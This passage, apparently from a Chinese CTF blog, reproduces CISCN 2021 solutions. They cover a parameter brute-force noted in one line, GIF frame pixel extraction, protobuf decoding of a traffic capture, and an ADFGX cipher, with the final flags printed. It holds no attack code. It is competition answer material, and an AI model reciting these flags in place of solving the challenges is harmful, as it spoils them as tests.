<p>抓包，爆破rb参数的值，从a-z开始爆破，最终在q的注释中找到flag<br><img src="https://img-blog.csdnimg.cn/20210516141137899.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MTUwOTQw,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h1 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h1><h2 id="running-pixel"><a href="#running-pixel" class="headerlink" title="running_pixel"></a>running_pixel</h2><p>使用脚本进行gif分帧</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># -*- coding: utf-8 -*-</span><br><span class="hljs-keyword">import</span> os<br><span class="hljs-keyword">from</span> PIL <span class="hljs-keyword">import</span> Image<br>file_name = <span class="hljs-string">&#x27;running_pixel.gif&#x27;</span><br><span class="hljs-comment"># 使用Image模块的open()方法打开gif动态图像时，默认是第一帧</span><br>im = Image.<span class="hljs-built_in">open</span>(file_name)<br><span class="hljs-comment"># 定义存储图片的文件名与读取的GIF图片名一致</span><br>file_save = file_name[:-<span class="hljs-number">4</span>]<br><span class="hljs-comment"># 在同级目录下创建存放每帧图片的文件夹</span><br><span class="hljs-comment"># 创建一级目录：os.mkdir(&#x27;D:\\gif1&#x27;)   创建多级目录：os.makedirs(&#x27;D:\\gif1\\gif1&#x27;)</span><br>os.mkdir(file_save)<br><span class="hljs-keyword">try</span>:<br>  <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>    <span class="hljs-comment"># 保存当前帧图片</span><br>    <span class="hljs-comment"># 获取当前文件的位置(GIF图的帧数)</span><br>    frame_number= im.tell()<br>    <span class="hljs-comment"># 保存图片，格式为png</span><br>    im.save(file_save+<span class="hljs-string">&#x27;/&#x27;</span>+<span class="hljs-built_in">str</span>(frame_number)+<span class="hljs-string">&#x27;.png&#x27;</span>)<br>    <span class="hljs-comment"># 获取下一帧图片</span><br>    im.seek(frame_number+<span class="hljs-number">1</span>)<br><span class="hljs-keyword">except</span> EOFError:<br>    <span class="hljs-keyword">pass</span><br>print(<span class="hljs-string">&quot;共:&quot;</span>, frame_number, <span class="hljs-string">&quot;张图片&quot;</span>)<br></code></pre></td></tr></table></figure>
<p>参考<a target="_blank" rel="noopener" href="https://mochu.blog.csdn.net/article/details/116855242">末初</a>师傅的wp</p>
<p>PS打开打开几张图片查看，有可疑白点，像素块为<code>RGB: (233,233,233)</code>，其他图片中也发现了这个像素块<br><img src="https://img-blog.csdnimg.cn/20210521203038633.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MTUwOTQw,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>提取382张图片的像素块</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># -*- coding: utf-8 -*-</span><br><span class="hljs-keyword">from</span> PIL <span class="hljs-keyword">import</span> Image<br><br>flag_img = Image.new(<span class="hljs-string">&#x27;1&#x27;</span>,(<span class="hljs-number">400</span>,<span class="hljs-number">400</span>))<br><span class="hljs-comment">#mode=1 1位黑白像素，每字节存储一个像素</span><br><span class="hljs-keyword">for</span> name <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-number">381</span>):<br>    framepic = Image.<span class="hljs-built_in">open</span>(<span class="hljs-string">f&quot;./running_pixel/<span class="hljs-subst">&#123;name&#125;</span>.png&quot;</span>)<br>    framepic = framepic.convert(<span class="hljs-string">&quot;RGB&quot;</span>)<br>    width,height = framepic.size<br>    <span class="hljs-keyword">for</span> w <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(width):<br>        <span class="hljs-keyword">for</span> h <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(height):<br>            <span class="hljs-keyword">if</span> framepic.getpixel((w,h)) == (<span class="hljs-number">233</span>,<span class="hljs-number">233</span>,<span class="hljs-number">233</span>):<br>                flag_img.putpixel((h,w),<span class="hljs-number">1</span>)<br><br>    flag_img.save(<span class="hljs-string">f&quot;flag_<span class="hljs-subst">&#123;name&#125;</span>.png&quot;</span>)<br></code></pre></td></tr></table></figure>
<p>最后一张图<br><img src="https://img-blog.csdnimg.cn/2021052120570322.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MTUwOTQw,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>根据字符出现顺序得到：12504D0F-9DE1-4B00-87A5-A5FDD0986A00<br>最终flag为</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">CISCN&#123;12504d0f-9de1-4b00-87a5-a5fdd0986a00&#125;<br></code></pre></td></tr></table></figure>
<h2 id="tiny-traffic"><a href="#tiny-traffic" class="headerlink" title="tiny traffic"></a>tiny traffic</h2><p>流量包拖入wirkshark中，导出http对象，发现了两个gzip和两个br文件<br><img src="https://img-blog.csdnimg.cn/20210521211621458.png" alt="在这里插入图片描述"><br>解压flag_wrapper得到…<br><img src="https://img-blog.csdnimg.cn/20210521211307860.png" alt="在这里插入图片描述"><br>把test后缀改为br，解压得到test：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs bash">syntax = <span class="hljs-string">&quot;proto3&quot;</span>;<br><br>message PBResponse &#123;<br>  int32 code = 1;<br>  int64 flag_part_convert_to_hex_plz = 2;<br>  message data &#123;<br>    string junk_data = 2;<br>    string flag_part = 1;<br>  &#125;<br>  repeated data dataList = 3;<br>  int32 flag_part_plz_convert_to_hex = 4;<br>  string flag_last_part = 5;<br>&#125;<br><br>message PBRequest &#123;<br>  string cate_id = 1;<br>  int32 page = 2;<br>  int32 pageSize = 3;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>下载解压后进入到bin目录，将之前解压出来的test改为test.proto并移动到bin目录</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">.\protoc.exe --python_out=. test.proto<br></code></pre></td></tr></table></figure>
<p>得到test_pb2.py，把解压后的secret也移动到bin目录<br><img src="https://img-blog.csdnimg.cn/20210521225101522.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MTUwOTQw,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>反序列化</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs bash">import test_pb2<br><br>with open(<span class="hljs-string">&#x27;./secret&#x27;</span>,<span class="hljs-string">&#x27;rb&#x27;</span>) as f:<br>    data = f.read()<br>    target = test_pb2.PBResponse()<br>    target.ParseFromString(data)<br>    <span class="hljs-built_in">print</span>(target)<br></code></pre></td></tr></table></figure>
<p>运行脚本得到</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs bash">code: 200<br>flag_part_convert_to_hex_plz: 15100450<br>dataList &#123;<br>  flag_part: <span class="hljs-string">&quot;e2345&quot;</span><br>  junk_data: <span class="hljs-string">&quot;7af2c&quot;</span><br>&#125;<br>dataList &#123;<br>  flag_part: <span class="hljs-string">&quot;7889b0&quot;</span><br>  junk_data: <span class="hljs-string">&quot;82bc0&quot;</span><br>&#125;<br>flag_part_plz_convert_to_hex: 16453958<br>flag_last_part: <span class="hljs-string">&quot;d172a38dc&quot;</span><br></code></pre></td></tr></table></figure>
<p>把15100450和16453958转换为hex，和其他hex按顺序拼接得到最终flag</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">CISCN&#123;e66a22e23457889b0fb1146d172a38dc&#125;<br></code></pre></td></tr></table></figure>
<h1 id="CRYPTO"><a href="#CRYPTO" class="headerlink" title="CRYPTO"></a>CRYPTO</h1><h2 id="classic"><a href="#classic" class="headerlink" title="classic"></a>classic</h2><p>附件内容</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">AXAXDFDXXAFADFGFXAADFGDXGFDXFFDFAXDXFFFFXGXGAAXAGAFDDXFFDXFFDXDXDXDXGFDFAXFXAADXAAGAXGDGXAXAFAXXFFXADFFGAADXDXAXDFDFDXXAXXDXDAAAAAFAXAAAFGGAFGFGXADXXADFGADXDFDFGAGFDGAXFGAXDGDADXFFFFDAGFADXGDX<br></code></pre></td></tr></table></figure>
<p><a target="_blank" rel="noopener" href="https://wishingstarmoye.com/ctf/adfgx">ADFGX密码</a>，用最经典的密码表<code>phqgmeaynofdxkrcvszwbutil</code>，key为题目名字<code>classic</code>，最可气的是解密时需要将附件中的内容反转得到密文：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">str=<span class="hljs-string">&quot;AXAXDFDXXAFADFGFXAADFGDXGFDXFFDFAXDXFFFFXGXGAAXAGAFDDXFFDXFFDXDXDXDXGFDFAXFXAADXAAGAXGDGXAXAFAXXFFXADFFGAADXDXAXDFDFDXXAXXDXDAAAAAFAXAAAFGGAFGFGXADXXADFGADXDFDFGAGFDGAXFGAXDGDADXFFFFDAGFADXGDX&quot;</span><br><span class="hljs-built_in">print</span>(str[::-1])<br><br><span class="hljs-comment">#XDGXDAFGADFFFFXDADGDXAGFXAGDFGAGFDFDXDAGFDAXXDAXGFGFAGGFAAAXAFAAAAADXDXXAXXDFDFDXAXDXDAAGFFDAXFFXXAFAXAXGDGXAGAAXDAAXFXAFDFGXDXDXDXDFFXDFFXDDFAGAXAAGXGXFFFFXDXAFDFFXDFGXDGFDAAXFGFDAFAXXDFDXAXA</span><br></code></pre></td></tr></table></figure>
<p>然后再解密得到flag，大意了<br><img src="https://img-blog.csdnimg.cn/20210521214939316.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MTUwOTQw,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>

      
      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2021/05/21/CISCN2021%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%8E%B0/">CISCN2021赛后复现</a></p>
        <p><span>文章作者:</span><a href="/" title="访问  的个人博客"></a></p>
        <p><span>发布时间:</span>2021年05月21日 - 22时26分</p>
        <p><span>最后更新:</span>2021年08月15日 - 11时59分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2021/05/21/CISCN2021%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%8E%B0/" title="CISCN2021赛后复现">https://swhat.github.io/2021/05/21/CISCN2021%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%8E%B0/</a>
            <span class="copy-path" data-clipboard-text="原文: https://swhat.github.io/2021/05/21/CISCN2021%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%8E%B0/　　作者: " title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target = "_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a href="/2021/05/23/%E6%B5%85%E6%9E%90%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89%E6%BC%8F%E6%B4%9E/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          浅析条件竞争漏洞
        
      </div>
    </a>
  
  
    <a href="/2021/05/21/SSTI%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">SSTI模板注入漏洞</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>

  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Web"><span class="toc-number">1.</span> <span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#esay-sql"><span class="toc-number">1.1.</span> <span class="toc-text">esay_sql</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#easy-source"><span class="toc-number">1.2.</span> <span class="toc-text">easy_source</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#MISC"><span class="toc-number">2.</span> <span class="toc-text">MISC</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#running-pixel"><span class="toc-number">2.1.</span> <span class="toc-text">running_pixel</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#tiny-traffic"><span class="toc-number">2.2.</span> <span class="toc-text">tiny traffic</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#CRYPTO"><span class="toc-number">3.</span> <span class="toc-text">CRYPTO</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#classic"><span class="toc-number">3.1.</span> <span class="toc-text">classic</span></a></li></ol></li></ol>
</div>
<input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">


<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";

    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
    }
</script>





<div class="bdsharebuttonbox">
	<a href="#" class="fx fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
	<a href="#" class="fx fa-weixin bds_weixin" data-cmd="weixin" title="分享到微信"></a>
	<a href="#" class="fx fa-qq bds_sqq" data-cmd="sqq" title="分享到QQ好友"></a>
	<a href="#" class="fx fa-facebook-official bds_fbook" data-cmd="fbook" title="分享到Facebook"></a>
	<a href="#" class="fx fa-twitter bds_twi" data-cmd="twi" title="分享到Twitter"></a>
	<a href="#" class="fx fa-linkedin bds_linkedin" data-cmd="linkedin" title="分享到linkedin"></a>
	<a href="#" class="fx fa-files-o bds_copy" data-cmd="copy" title="分享到复制网址"></a>
</div>
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>




    
        <div id="gitments"></div>
<script src="/js/gitment.browser.js"></script>
<script>
    var gitment = new Gitment({
      id: window.location.pathname,
      owner: 'swhat',
      repo: 'swhat.github.io',
      oauth: {
        client_id: '',
        client_secret: '',
      },
    })
    gitment.render('gitments')
</script>
    



    <div class="scroll" id="post-nav-button">
        
            <a href="/2021/05/23/%E6%B5%85%E6%9E%90%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89%E6%BC%8F%E6%B4%9E/" title="上一篇: 浅析条件竞争漏洞">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a href="/2021/05/21/SSTI%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/" title="下一篇: SSTI模板注入漏洞">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2021/10/24/ISCTF2021/">ISCTF2021</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/08/13/RCTS-CERT-CTF2021/">RCTS CERT CTF2021</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/08/09/2021DASCTF-July-X-CBCTF-4th/">2021DASCTF July X CBCTF 4th</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/08/04/PHP%E4%BC%AA%E9%9A%8F%E6%9C%BA%E6%95%B0%E6%BC%8F%E6%B4%9E/">PHP伪随机数漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/07/05/Docker-%E5%AE%89%E8%A3%85%E7%8E%AF%E5%A2%83/">Docker-练习</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/06/29/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E4%B9%8B%E4%BA%8C%E6%AC%A1%E6%B8%B2%E6%9F%93/">文件上传之二次渲染</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/06/29/Docker-%E6%90%AD%E5%BB%BA%E9%A2%98%E7%9B%AE%E7%8E%AF%E5%A2%83/">Docker-搭建题目环境</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/06/21/Docker-%E5%AE%89%E8%A3%85/">Docker-安装</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/06/03/Volatility%E5%86%85%E5%AD%98%E5%8F%96%E8%AF%81/">Volatility内存取证</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/05/27/ISCC2021-Web-WP/">ISCC2021 Web WP</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/05/26/ISCC2021-MISC-WP/">ISCC2021 MISC WP</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/05/25/XXE%E6%BC%8F%E6%B4%9E/">XXE漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/05/23/%E6%B5%85%E6%9E%90%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89%E6%BC%8F%E6%B4%9E/">浅析条件竞争漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/05/21/CISCN2021%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%8E%B0/">CISCN2021赛后复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/05/21/SSTI%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/">SSTI模板注入漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/25/Struts2%E6%8B%A6%E6%88%AA%E5%99%A8/">Struts2之拦截器</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/12/USB%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/">USB流量分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/11/HTTP%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81%E6%BC%8F%E6%B4%9E/">HTTP请求走私漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/11/HTTP%E5%8D%8F%E8%AE%AE/">HTTP协议</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/04/05/%E8%99%8E%E7%AC%A6-%E7%BA%A2%E6%98%8E%E8%B0%B7-ctfshow%E6%B8%94%E4%BA%BA%E6%9D%AF%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%8E%B0/">虎符+红明谷+ctfshow渔人杯赛后复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/28/Struts2%E6%A0%B8%E5%BF%83%E9%85%8D%E7%BD%AE/">Struts2核心配置</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/26/CTFshow-Web%E5%85%A5%E9%97%A8-%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2/">CTFshow-Web入门-信息泄露</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/03/19/Struts2%E6%A1%86%E6%9E%B6%E5%85%A5%E9%97%A8/">Struts2框架入门</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/02/09/%E6%98%A5%E7%A7%8B%E6%9D%AF%E6%96%B0%E5%B9%B4%E6%AC%A2%E4%B9%90%E8%B5%9B/">春秋杯新年欢乐赛</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/16/CTFHub-Web-RCE%E7%BB%83%E4%B9%A0/">CTFHub-Web-RCE练习</a></li><li class="post-list-item"><a class="post-list-link" href="/2021/01/16/%E7%BA%BF%E4%B8%8BAWD%E6%94%BB%E9%98%B2%E8%B5%9B%E6%80%BB%E7%BB%93/">线下AWD攻防赛总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/12/15/PHP%20%E6%95%B0%E6%8D%AE%E5%BA%93%E6%93%8D%E4%BD%9C/">PHP 数据库操作</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/22/CTFHub-Web-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%83%E4%B9%A0/">CTFHub-Web-文件上传练习</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/15/CTFHub-Web-sql%E6%B3%A8%E5%85%A5%E7%BB%83%E4%B9%A0/">CTFHub-Web-sql注入练习</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/11/04/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8B%E5%BC%B1%E7%B1%BB%E5%9E%8B%E7%BB%95%E8%BF%87/">代码审计之弱类型绕过</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/10/24/CTFHub-Web-%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%BB%83%E4%B9%A0/">CTFHub-Web-信息泄露练习</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/10/18/%E6%B5%85%E8%B0%88PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">浅谈PHP反序列化漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/10/04/RSA%E7%AE%97%E6%B3%95%E8%AF%A6%E8%A7%A3%E4%B8%8E%E7%BB%83%E4%B9%A0/">RSA算法详解与练习</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/09/20/PHP%20%E6%96%87%E4%BB%B6%E4%B8%8E%E7%9B%AE%E5%BD%95%E6%93%8D%E4%BD%9C/">PHP 文件与目录操作</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/09/03/PHP%20cookie%E4%B8%8Esession/">PHP cookie与session</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/05/22/PHP%20%E8%BF%90%E7%AE%97%E7%AC%A6/">PHP 运算符</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/05/20/PHP%20%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5%E5%92%8C%E5%8F%98%E9%87%8F/">PHP的基本概念和变量</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/04/20/CTF-MISC%E6%80%BB%E7%BB%93/">CTF-MISC总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/04/%E4%B8%AA%E4%BA%BA%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA%E5%8E%86%E7%A8%8B/">个人博客搭建历程</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/02/hello-world/">Hello World</a></li></ul>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
    <script>
        $(".post-list").addClass("toc-article");
        $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
            }
        })
    </script>



    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2022 Atkx
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/luuman/hexo-theme-spfk" target="_blank">spfk</a> by luuman
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" >海贼到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>


<script src="/js/main.js"></script>


    <script>
        $(document).ready(function() {
            var backgroundnum = 24;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(

            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/haruto.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/love.js"></script>
<!--浏览器搞笑标题-->
<script type="text/javascript" src="/js/FunnyTitle.js"></script>